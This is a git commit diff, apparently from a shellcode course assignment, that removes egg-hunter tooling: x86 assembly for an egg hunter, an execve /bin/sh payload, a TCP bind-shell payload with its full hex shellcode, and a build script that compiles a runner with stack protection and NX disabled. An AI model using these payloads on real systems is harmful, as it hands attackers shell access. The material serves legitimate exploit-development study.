Assignment 3 - major updates over Egg Hunter
This commit is contained in:
parent
abf6ca0fe7
commit
eaeab3e5f7
11
exam3/NOTES
11
exam3/NOTES
@ -1,11 +0,0 @@
|
|||||||
NOTES
|
|
||||||
|
|
||||||
no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
|
|
||||||
|
|
||||||
execstack: disables Executable space protection (NX).
|
|
||||||
Or Data Execution Prevention (DEP) on Windows,
|
|
||||||
or Write XOR Execute (W^X) on BSD.
|
|
||||||
CPU’s NX bit ("Never eXecute").
|
|
||||||
|
|
||||||
To disalbe Address Space Layout Randomization (ASLR) when running binary
|
|
||||||
setarch `arch` -R ./program
|
|
32
exam3/USAGE
32
exam3/USAGE
@ -1,32 +0,0 @@
|
|||||||
USAGE
|
|
||||||
|
|
||||||
1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
|
|
||||||
|
|
||||||
I'm using a symlink as follows
|
|
||||||
|
|
||||||
exam3$ ln -svf payload-execve-stack.nasm payload.nasm
|
|
||||||
`payload.nasm' -> `payload-execve-stack.nasm'
|
|
||||||
|
|
||||||
|
|
||||||
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
|
|
||||||
|
|
||||||
exam3$ ./make.sh "egg.MaRk"
|
|
||||||
[I] Using custom EGG mark: egg.MaRk
|
|
||||||
[+] Compiling payload.nasm ...
|
|
||||||
[+] Compiling hunter.nasm ...
|
|
||||||
[+] Extracting PAYLOAD code from payload ...
|
|
||||||
[+] Adding EGG mark to PAYLOAD ...
|
|
||||||
[+] Checking PAYLOAD code for NULLs ...
|
|
||||||
[+] Extracting HUNTER code from hunter ...
|
|
||||||
[+] Checking HUNTER code for NULLs ...
|
|
||||||
[+] Compiling shellcode.c ...
|
|
||||||
-rwx------. 1 arno arno 5100 Mar 27 17:02 ./shellcode
|
|
||||||
[+] All done!
|
|
||||||
|
|
||||||
|
|
||||||
3. Run the shellcode
|
|
||||||
|
|
||||||
exam3$ ./shellcode
|
|
||||||
Hunter Length: 21
|
|
||||||
Payload Length: 36
|
|
||||||
sh-4.1$
|
|
@ -1,79 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Filename: egghunter.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
;
|
|
||||||
;
|
|
||||||
|
|
||||||
section .data
|
|
||||||
egg1 equ "Egg-" ; DWORD Egg marker part1
|
|
||||||
egg2 equ "Mark" ; DWORD Egg marker part2
|
|
||||||
|
|
||||||
|
|
||||||
section .text
|
|
||||||
global _start
|
|
||||||
|
|
||||||
|
|
||||||
_start:
|
|
||||||
jmp short EggPoint
|
|
||||||
|
|
||||||
continue:
|
|
||||||
pop eax
|
|
||||||
|
|
||||||
; Searching for the Egg marker
|
|
||||||
next:
|
|
||||||
inc eax ; Searching backwards
|
|
||||||
isEgg:
|
|
||||||
cmp dword [eax-8], egg1
|
|
||||||
jne next
|
|
||||||
cmp dword [eax-4], egg2
|
|
||||||
jne next
|
|
||||||
call eax
|
|
||||||
|
|
||||||
; EXIT
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 1
|
|
||||||
xor ebx, ebx
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
EggPoint:
|
|
||||||
call continue
|
|
||||||
|
|
||||||
Egg:
|
|
||||||
db "Egg-Mark" ; QWORD egg marker
|
|
||||||
|
|
||||||
; loop counter = 8
|
|
||||||
xor ecx, ecx
|
|
||||||
mov cl, 8
|
|
||||||
decloop:
|
|
||||||
dec eax
|
|
||||||
loop decloop
|
|
||||||
|
|
||||||
mov ecx, eax
|
|
||||||
xor edx, edx
|
|
||||||
mov dl, 8
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 4
|
|
||||||
xor ebx, ebx
|
|
||||||
mov bl, 1
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 1
|
|
||||||
xor ebx, ebx
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
|
|
@ -1,40 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Filename: hunter.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
;
|
|
||||||
;
|
|
||||||
|
|
||||||
section .data
|
|
||||||
egg1 equ "Egg-" ; DWORD Egg marker part1
|
|
||||||
egg2 equ "Mark" ; DWORD Egg marker part2
|
|
||||||
|
|
||||||
|
|
||||||
section .text
|
|
||||||
global _start
|
|
||||||
|
|
||||||
|
|
||||||
_start:
|
|
||||||
; Searching for the Egg marker
|
|
||||||
next:
|
|
||||||
inc eax ; Searching forward (can also try dec eax)
|
|
||||||
isEgg:
|
|
||||||
cmp dword [eax-8], egg1 ; Checking if we can see egg1
|
|
||||||
jne next ; If not, continuing to search
|
|
||||||
cmp dword [eax-4], egg2
|
|
||||||
jne next
|
|
||||||
|
|
||||||
call eax ; Once found, we call our payload
|
|
130
exam3/make.sh
130
exam3/make.sh
@ -1,130 +0,0 @@
|
|||||||
#!/usr/bin/env sh
|
|
||||||
#
|
|
||||||
# USAGE
|
|
||||||
# ./make.sh [Egg-Mark]
|
|
||||||
#
|
|
||||||
# NOTE
|
|
||||||
# Egg-Mark must be a plaintext with 8 bytes in length
|
|
||||||
# If Egg-Mark was not specified, the default one will be used.
|
|
||||||
#
|
|
||||||
# To specify a custom payload, simply modify the code of payload.nasm file.
|
|
||||||
# Alternativly, you can modify PAYLOADCODE= variable down below the code.
|
|
||||||
#
|
|
||||||
|
|
||||||
ARG1=$1
|
|
||||||
|
|
||||||
if [ -z "$ARG1" ]; then
|
|
||||||
echo " [I] Argument not specified. Using default EGG mark."
|
|
||||||
ARG1="Egg-Mark";
|
|
||||||
elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
|
|
||||||
echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
|
|
||||||
exit 1;
|
|
||||||
else
|
|
||||||
echo " [I] Using custom EGG mark: "$ARG1
|
|
||||||
fi
|
|
||||||
|
|
||||||
|
|
||||||
DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
|
|
||||||
EGGMARK=$ARG1
|
|
||||||
NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
|
|
||||||
|
|
||||||
# Uncomment to save EGGMARK in HEX
|
|
||||||
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
|
|
||||||
|
|
||||||
# Cleanup
|
|
||||||
rm -f shellcode payload.o payload hunter.o hunter
|
|
||||||
|
|
||||||
echo " [+] Compiling payload.nasm ..."
|
|
||||||
nasm -f elf32 -o payload.o payload.nasm
|
|
||||||
ld -m elf_i386 -o payload payload.o
|
|
||||||
|
|
||||||
echo " [+] Compiling hunter.nasm ..."
|
|
||||||
nasm -f elf32 -o hunter.o hunter.nasm
|
|
||||||
ld -m elf_i386 -o hunter hunter.o
|
|
||||||
|
|
||||||
echo " [+] Extracting PAYLOAD code from payload ..."
|
|
||||||
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
|
|
||||||
|
|
||||||
echo " [+] Adding EGG mark to PAYLOAD ..."
|
|
||||||
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
|
|
||||||
|
|
||||||
echo " [+] Checking PAYLOAD code for NULLs ..."
|
|
||||||
if [[ $FULL_PAYLOADCODE == *00* ]]; then
|
|
||||||
echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
|
|
||||||
exit 1
|
|
||||||
fi
|
|
||||||
|
|
||||||
|
|
||||||
echo " [+] Extracting HUNTER code from hunter ..."
|
|
||||||
HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
|
|
||||||
|
|
||||||
# For debugging only
|
|
||||||
#echo ${DEFAULTEGG[0]}
|
|
||||||
#echo ${DEFAULTEGG[1]}
|
|
||||||
#echo ${NEWEGG[0]}
|
|
||||||
#echo ${NEWEGG[1]}
|
|
||||||
|
|
||||||
# Preparing Default egg to HEX form in order to replace it with a New egg
|
|
||||||
DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
|
|
||||||
DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
|
|
||||||
|
|
||||||
# Uncomment to save new EGGMARK in HEX format
|
|
||||||
NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
|
|
||||||
NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
|
|
||||||
|
|
||||||
# Uncomment to save new EGGMARK in Plaintext format
|
|
||||||
#NEWEGG1=$(echo -n ${NEWEGG[0]})
|
|
||||||
#NEWEGG2=$(echo -n ${NEWEGG[1]})
|
|
||||||
|
|
||||||
|
|
||||||
FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
|
|
||||||
|
|
||||||
echo " [+] Checking HUNTER code for NULLs ..."
|
|
||||||
if [[ $FULL_HUNTERCODE == *00* ]]; then
|
|
||||||
echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
|
|
||||||
exit 1
|
|
||||||
fi
|
|
||||||
|
|
||||||
|
|
||||||
# Uncomment to see what will is replaced (default egg with a new one)
|
|
||||||
#echo $DEFEGG1
|
|
||||||
#echo $DEFEGG2
|
|
||||||
#echo $NEWEGG1
|
|
||||||
#echo $NEWEGG2
|
|
||||||
#echo $HUNTERCODE
|
|
||||||
#echo $FULL_HUNTERCODE
|
|
||||||
|
|
||||||
cat > shellcode.c << EOF
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <string.h>
|
|
||||||
|
|
||||||
unsigned char hunter[] = \
|
|
||||||
$FULL_HUNTERCODE;
|
|
||||||
|
|
||||||
unsigned char garbage1[] = \
|
|
||||||
"Just some garbage here...";
|
|
||||||
|
|
||||||
unsigned char payload[] = \
|
|
||||||
$FULL_PAYLOADCODE;
|
|
||||||
|
|
||||||
unsigned char garbage2[] = \
|
|
||||||
"And some garbage there...";
|
|
||||||
|
|
||||||
main()
|
|
||||||
{
|
|
||||||
printf("Hunter Length: %d\n", strlen(hunter));
|
|
||||||
printf("Payload Length: %d\n", strlen(payload));
|
|
||||||
int (*ret)() = (int(*)())hunter;
|
|
||||||
ret();
|
|
||||||
}
|
|
||||||
EOF
|
|
||||||
|
|
||||||
echo " [+] Compiling shellcode.c ..."
|
|
||||||
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
|
|
||||||
|
|
||||||
# Cleanup
|
|
||||||
rm -f payload.o payload hunter.o hunter
|
|
||||||
|
|
||||||
ls -la ./shellcode
|
|
||||||
|
|
||||||
echo " [+] All done!"
|
|
@ -1,44 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
|
|
||||||
; Filename: payload-execve-stack.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
|
|
||||||
global _start
|
|
||||||
|
|
||||||
|
|
||||||
section .text
|
|
||||||
|
|
||||||
_start:
|
|
||||||
; EAX
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 11 ; execve syscall
|
|
||||||
|
|
||||||
; EBX
|
|
||||||
xor edx, edx
|
|
||||||
push edx ; NULL termination of '//bin/sh' string
|
|
||||||
push 0x68732f6e ; '//bin/sh' in reverse
|
|
||||||
push 0x69622f2f ; beginning of '//bin/sh' string is here
|
|
||||||
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
|
|
||||||
|
|
||||||
; ECX
|
|
||||||
push edx ; NULL termination of a stack
|
|
||||||
push ebx ; load our '//bin/sh' on a stack
|
|
||||||
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
|
|
||||||
|
|
||||||
; EDX
|
|
||||||
push edx ; NULL terminator
|
|
||||||
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
|
|
||||||
int 0x80
|
|
||||||
|
|
@ -1,113 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Filename: payload-shell_bind_tcp_smaller.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
;
|
|
||||||
; DESC:
|
|
||||||
; - Binds to a port 43775
|
|
||||||
; - Execs Shell on incoming connection
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Shellcode size: 108 bytes
|
|
||||||
; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
|
|
||||||
;
|
|
||||||
; Port is the last two bytes of the shellcode. In hex \xaa\xff (0xaaff = 43775)
|
|
||||||
;
|
|
||||||
;
|
|
||||||
|
|
||||||
global _start
|
|
||||||
|
|
||||||
section .text
|
|
||||||
|
|
||||||
_start:
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 102 ; socketcall
|
|
||||||
xor ebx, ebx
|
|
||||||
inc ebx ; 1 = SYS_SOCKET socket()
|
|
||||||
push BYTE 6 ; IPPROTO_TCP || int protocol);
|
|
||||||
push BYTE 1 ; SOCK_STREAM || int type,
|
|
||||||
push BYTE 2 ; AF_INET || socket(int domain,
|
|
||||||
mov ecx, esp ; ECX - PTR to arguments for socket()
|
|
||||||
int 0x80
|
|
||||||
mov esi, eax ; save socket fd in ESI for later
|
|
||||||
|
|
||||||
|
|
||||||
jmp short call_get_port
|
|
||||||
port_in_esp:
|
|
||||||
pop edi ; getting port address from ESP
|
|
||||||
|
|
||||||
push BYTE 102
|
|
||||||
pop eax ; socketcall
|
|
||||||
inc ebx ; 2 = SYS_BIND bind()
|
|
||||||
xor edx, edx
|
|
||||||
push edx ; 0 = ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
|
|
||||||
push WORD [edi] ; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
|
|
||||||
push WORD bx ; 2 = AF_INET || struct sockaddr { short sin_family,
|
|
||||||
mov ecx, esp ; Save PTR to sockaddr struct in ECX
|
|
||||||
push BYTE 16 ; socklen_t addrlen);
|
|
||||||
push ecx ; const struct sockaddr *addr,
|
|
||||||
push esi ; bind(int sockfd,
|
|
||||||
mov ecx, esp ; ECX = PTR to arguments for bind()
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
|
|
||||||
mov BYTE al, 102 ; socketcall
|
|
||||||
inc ebx
|
|
||||||
inc ebx ; 4 = SYS_LISTEN listen()
|
|
||||||
push BYTE 1 ; int backlog);
|
|
||||||
push esi ; listen(int sockfd,
|
|
||||||
mov ecx, esp ; ECX = PTR to arguments for listen()
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
|
|
||||||
mov BYTE al, 102 ; socketcall
|
|
||||||
inc ebx ; 5 = SYS_ACCEPT = accept()
|
|
||||||
push edx ; socklen_t *addrlen = 0);
|
|
||||||
push edx ; struct sockaddr *addr = NULL,
|
|
||||||
push esi ; listen(int sockfd,
|
|
||||||
mov ecx, esp ; ECX = PTR to arguments for accept()
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
|
|
||||||
; dup2 to duplicate sockfd, that will attach the client to a shell
|
|
||||||
; that we'll spawn below in execve syscall
|
|
||||||
xchg eax, ebx ; after EBX = sockfd, EAX = 5
|
|
||||||
push BYTE 2
|
|
||||||
pop ecx
|
|
||||||
dup2_loop:
|
|
||||||
mov BYTE al, 63
|
|
||||||
int 0x80
|
|
||||||
dec ecx
|
|
||||||
jns dup2_loop
|
|
||||||
|
|
||||||
|
|
||||||
; spawning as shell
|
|
||||||
xor eax, eax
|
|
||||||
push eax
|
|
||||||
push 0x68732f6e ; '//bin/sh' in reverse
|
|
||||||
push 0x69622f2f ; beginning of '//bin/sh' string is here
|
|
||||||
mov ebx, esp
|
|
||||||
push eax
|
|
||||||
mov edx, esp ; ESP is now pointing to EDX
|
|
||||||
push ebx
|
|
||||||
mov ecx, esp
|
|
||||||
mov al, 11 ; execve
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
call_get_port:
|
|
||||||
call port_in_esp
|
|
||||||
db 0xaa, 0xff ; BYTE (43775 in straight hex)
|
|
||||||
|
|
@ -1 +0,0 @@
|
|||||||
payload-execve-stack.nasm
|
|
@ -1,18 +0,0 @@
|
|||||||
#include <stdio.h>
|
|
||||||
#include <string.h>
|
|
||||||
|
|
||||||
unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
|
|
||||||
|
|
||||||
unsigned char garbage1[] = "Just some garbage here...";
|
|
||||||
|
|
||||||
unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
|
|
||||||
|
|
||||||
unsigned char garbage2[] = "And some garbage there...";
|
|
||||||
|
|
||||||
main()
|
|
||||||
{
|
|
||||||
printf("Hunter Length: %d\n", strlen(hunter));
|
|
||||||
printf("Payload Length: %d\n", strlen(payload));
|
|
||||||
int (*ret)() = (int(*)())hunter;
|
|
||||||
ret();
|
|
||||||
}
|
|
Loading…
Reference in New Issue
Block a user